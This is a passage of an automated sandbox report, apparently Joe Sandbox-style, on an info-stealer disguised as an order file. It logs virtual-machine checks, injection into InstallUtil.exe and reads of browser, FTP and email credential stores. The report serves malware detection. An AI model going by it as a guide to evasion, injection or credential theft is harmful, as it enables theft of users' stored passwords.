                    Source: Yara matchFile source: Process Memory Space: GEFA-Order 232343-68983689.exe PID: 7444, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Cbgoomiexw.exe PID: 7744, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Cbgoomiexw.exe PID: 8052, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.00000000032AA000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000003.00000002.1881514343.000000000269A000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000007.00000002.1965310119.00000000030A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeMemory allocated: 18E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeMemory allocated: 3260000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeMemory allocated: 5260000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1380000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2F00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1410000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeMemory allocated: 25C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeMemory allocated: 2650000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeMemory allocated: 4650000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: DD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2880000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4880000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeMemory allocated: 1520000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeMemory allocated: 2FF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeMemory allocated: 4FF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 30B0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 32C0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 30B0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: InstallUtil.exe, 00000001.00000002.1879587990.0000000001286000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq>
                    Source: Cbgoomiexw.exe, 00000007.00000002.1961076055.00000000012E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
                    Source: Cbgoomiexw.exe, 00000007.00000002.1965310119.00000000030A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: Cbgoomiexw.exe, 00000007.00000002.1965310119.00000000030A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1714806608.0000000001687000.00000004.00000020.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000003.00000002.1878408831.000000000095B000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.1986513923.0000000005DD0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2941663496.0000000006600000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: DE1008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 72C008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1152008Jump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeQueries volume information: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeQueries volume information: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeQueries volume information: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.1996337104.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2913625192.000000000330E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1727745948.0000000004480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.1965310119.00000000031FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1881514343.00000000028CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1879017395.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1966127439.00000000028D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2913625192.00000000032CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1884023773.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1716960379.00000000034E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1903361036.0000000003921000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1884023773.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1966127439.0000000002881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: GEFA-Order 232343-68983689.exe PID: 7444, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7548, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Cbgoomiexw.exe PID: 7744, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7888, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Cbgoomiexw.exe PID: 8052, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8124, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.1996337104.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1727745948.0000000004480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.1965310119.00000000031FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1881514343.00000000028CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1879017395.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2913625192.00000000032CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1716960379.00000000034E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1903361036.0000000003921000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1884023773.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1966127439.0000000002881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: GEFA-Order 232343-68983689.exe PID: 7444, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7548, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Cbgoomiexw.exe PID: 7744, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7888, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Cbgoomiexw.exe PID: 8052, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8124, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.1996337104.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2913625192.000000000330E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1727745948.0000000004480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.1965310119.00000000031FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1881514343.00000000028CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1879017395.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1966127439.00000000028D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2913625192.00000000032CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1884023773.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1716960379.00000000034E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1903361036.0000000003921000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1884023773.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1966127439.0000000002881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: GEFA-Order 232343-68983689.exe PID: 7444, type: MEMORYSTR
